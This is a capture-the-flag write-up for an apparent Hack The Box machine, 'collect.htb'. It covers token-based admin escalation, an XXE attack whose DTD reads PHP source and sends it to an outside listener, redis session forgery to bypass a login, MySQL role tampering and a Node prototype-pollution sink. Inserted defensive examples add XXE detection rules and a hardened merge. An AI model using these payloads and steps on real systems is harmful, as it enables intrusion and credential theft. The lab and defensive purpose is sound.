```bash
git clone https://github.com/mrts/burp-suite-http-proxy-history-converter.git
cd burp-suite-http-proxy-history-converter
pip install --requirement=requirements.txt
# Will create a proxy_history.xml.html file
python convert-burp-suite-http-proxy-history-to-csv.py ../proxy_history.xml
```
Checking the formatted logs, we discover a request that can be used to gain admin access:

```http
POST /set/role/admin HTTP/1.1
Host: collect.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r8qne20hig1k3li6prgk91t33j
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

token=ddac62a28254561001277727cb397baf
```
Exploitation
API XXE
Register an account on collect.htb and capture the requests in Burp.

Use the previously discovered token to elevate our privileges:

```http
POST /set/role/admin HTTP/1.1
Host: collect.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://collect.htb
Connection: close
Referer: http://collect.htb/login
Cookie: PHPSESSID=b8gl9c885k7c52t61afnen4nj8
Upgrade-Insecure-Requests: 1

token=ddac62a28254561001277727cb397baf
```
Open Collect - Admin in your browser, register a new API user and capture the request:

```http
POST /api HTTP/1.1
Host: collect.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 171
Origin: http://collect.htb
Connection: close
Referer: http://collect.htb/admin
Cookie: PHPSESSID=b8gl9c885k7c52t61afnen4nj8

manage_api=<?xml version="1.0" encoding="UTF-8"?><root><method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk1</password></user></root>
```
After some trial and error we are able to read files. Check bootstrap.php to obtain the redis password!
xxe.dtd
Do it for index.php first to get an overview, then check bootstrap.php, which is referenced in index.php.
While poking around we also discovered /var/www/developers/.htpasswd.

```dtd
<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../bootstrap.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.10.16.28/?file=%file;'>">
%eval;
%exfiltrate;
```
Burp Request

```http
POST /api HTTP/1.1
Host: collect.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 249
Origin: http://collect.htb
Connection: close
Referer: http://collect.htb/admin
Cookie: PHPSESSID=b8gl9c885k7c52t61afnen4nj8
token: ddac62a28254561001277727cb397baf

manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.16.28/xxe.dtd"> %xxe;]><root><method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk</password></user></root>
```
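From the defender's side, the requests above are easy to spot on the wire: the `manage_api` parameter should never carry a DOCTYPE, an entity declaration or a php://filter wrapper. The following detection routine is an added example (not part of the writeup) that parses form-encoded bodies posted to /api and flags those indicators; the sample bodies are constructed and ATTACKER_HOST is a placeholder.

```javascript
// Added defensive example (not from the writeup): flag XXE indicators in
// form-encoded bodies posted to /api. The rules cover the inline DOCTYPE,
// external and parameter entities and php://filter wrapper seen above.
const XXE_RULES = [
  { id: 'inline-dtd',       re: /<!DOCTYPE\b[^>]*\[/i },
  { id: 'external-entity',  re: /<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b/i },
  { id: 'parameter-entity', re: /<!ENTITY\s+%/i },
  { id: 'php-filter',       re: /php:\/\/filter\//i },
];

// Parse application/x-www-form-urlencoded into a plain object;
// URLSearchParams undoes the percent-encoding Burp shows in the request.
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Return the ids of all rules matching the XML carried in manage_api.
function detectXxe(body) {
  const xml = parseFormBody(body).manage_api || '';
  return XXE_RULES.filter(r => r.re.test(xml)).map(r => r.id);
}

// Constructed samples: a benign registration call and one that pulls a
// remote DTD (ATTACKER_HOST is a placeholder, not a real address).
const BENIGN_BODY = 'manage_api=' + encodeURIComponent(
  '<?xml version="1.0" encoding="UTF-8"?><root><method>POST</method>' +
  '<uri>/auth/register</uri><user><username>u</username>' +
  '<password>p</password></user></root>');
const XXE_BODY = 'manage_api=' + encodeURIComponent(
  '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe ' +
  'SYSTEM "http://ATTACKER_HOST/xxe.dtd"> %xxe;]><root><method>POST</method></root>');

console.log(detectXxe(BENIGN_BODY)); // []
console.log(detectXxe(XXE_BODY));    // [ 'inline-dtd', 'external-entity', 'parameter-entity' ]
```

The real fix is on the server: parse the XML with entity substitution and external DTD loading disabled, so the indicators above become noise rather than a breach.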
We'll use the basic auth creds to get a look at developers.collect.htb, but there's nothing there except a new login panel.
Redis
We are now also able to access redis:

```bash
redis-cli -h collect.htb
```

```
collect.htb:6379> AUTH COLLECTR3D1SPASS
OK
collect.htb:6379> info
# Keyspace
db0:keys=2,expires=2,avg_ttl=1137183
collect.htb:6379> keys *
# Our new session on developers.collect.htb
1) "PHPREDIS_SESSION:q18lv56iqpr197npjbakrboird"
# Our session on collect.htb
3) "PHPREDIS_SESSION:b8gl9c885k7c52t61afnen4nj8"
collect.htb:6379> get PHPREDIS_SESSION:q18lv56iqpr197npjbakrboird
""
collect.htb:6379> get PHPREDIS_SESSION:b8gl9c885k7c52t61afnen4nj8
"username|s:4:\"mrk1\";role|s:5:\"admin\";"
# Let's try to bypass developers.collect.htb login page
# We'll use auth|s:1:\"a\";
collect.htb:6379> set PHPREDIS_SESSION:q18lv56iqpr197npjbakrboird "username|s:4:\"mrk1\";role|s:5:\"admin\";auth|s:1:\"a\";"
```
We have successfully bypassed the login page and can now see the developers section.
The parameter ?page is vulnerable to remote code execution using filter chains. We will use the Filter Chain Generator project to get a reverse shell on the system :)
/home/victor/pollution_api/controllers/Messages_send.js
While going through the source code we can spot a possible prototype pollution vulnerability.

Checking the code, however, tells us that we need admin permissions on the API.

```js
const Message = require('../models/Message');
const { decodejwt } = require('../functions/jwt');
const _ = require('lodash');
const { exec } = require('child_process');

const messages_send = async (req, res) => {
    const token = decodejwt(req.headers['x-access-token'])
    if (req.body.text) {
        const message = {
            user_sent: token.user,
            title: "Message for admins",
        };
        _.merge(message, req.body);
        exec('/home/victor/pollution_api/log.sh log_message');
        Message.create({ text: JSON.stringify(message), user_sent: token.user });
        return res.json({ Status: "Ok" });
    }
    return res.json({ Status: "Error", Message: "Parameter text not found" });
}

module.exports = { messages_send };
```
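The weak spot is `_.merge(message, req.body)`: a recursive merge that walks into `__proto__` lets a JSON body reach Object.prototype. The block below is an added example, not the pollution_api's own code: a minimal deep merge with the same recursive behaviour as the vulnerable call, beside a hardened merge that refuses prototype keys, both run against a constructed request body (lodash itself is not used, so the example is self-contained).

```javascript
// Added example, not the pollution_api's own code: a deep merge with the
// same recursive behaviour as the vulnerable _.merge(message, req.body)
// above, beside a hardened merge that refuses to walk prototype keys.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable: a body like {"__proto__":{"x":1}} makes target.__proto__
// (Object.prototype) the recursion target, so x lands on every object.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (isPlainObject(source[key]) && isPlainObject(target[key])) {
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: drop prototype-walking keys and only recurse into own properties.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    if (isPlainObject(source[key])) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Mirror the handler's message object, merge a constructed body into it and
// report whether an unrelated fresh object inherited the injected property.
function handleMessage(body, merge) {
  const message = { user_sent: 'alice', title: 'Message for admins' };
  merge(message, body);
  const leaked = ({}).injected !== undefined;
  delete Object.prototype.injected; // undo any pollution so later code is unaffected
  return { message, leaked };
}
// JSON.parse keeps "__proto__" as an own key, exactly as a JSON body parser would.
const CONSTRUCTED_BODY = JSON.parse('{"text":"hi","__proto__":{"injected":"yes"}}');
console.log(handleMessage(CONSTRUCTED_BODY, unsafeMerge).leaked); // true
console.log(handleMessage(CONSTRUCTED_BODY, safeMerge).leaked);   // false
```

Besides hardening the merge, the handler only needs `text` from the body, so copying that one field instead of merging the whole request removes the sink entirely.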
Getting API Admin Role
Using our discovered mysql credentials we are going to elevate the permissions of the API user that we created earlier:

```
mysql -u webapp_user -p
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| developers         |
| forum              |
| information_schema |
| mysql              |
| performance_schema |
| pollution_api      |
| webapp             |
+--------------------+
MariaDB [(none)]> use pollution_api;
Database changed
MariaDB [pollution_api]> show tables;
+-------------------------+
| Tables_in_pollution_api |
+-------------------------+
| messages                |
| users                   |
+-------------------------+
MariaDB [pollution_api]> select * from users
    -> ;
+----+----------+----------+------+---------------------+---------------------+
| id | username | password | role | createdAt           | updatedAt           |
+----+----------+----------+------+---------------------+---------------------+
|  1 | mrk1     | xxxx     | user | 2022-12-13 03:10:01 | 2022-12-13 03:10:01 |
|  2 | mrk2     | xxxx     | user | 2022-12-13 03:10:09 | 2022-12-13 03:10:09 |
|  3 | test     | xxxx     | user | 2022-12-13 03:28:25 | 2022-12-13 03:28:25 |
+----+----------+----------+------+---------------------+---------------------+
MariaDB [pollution_api]> update users set role='admin' where id=1;
Query OK, 1 row affected (0.002 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```
API Fun
API Token
Log in using our creds to get our API token:

```bash
curl -X POST http://localhost:3000/auth/login -H 'Content-Type: application/json' -d '{"username":"mrk1", "password":"xxxx"}'
```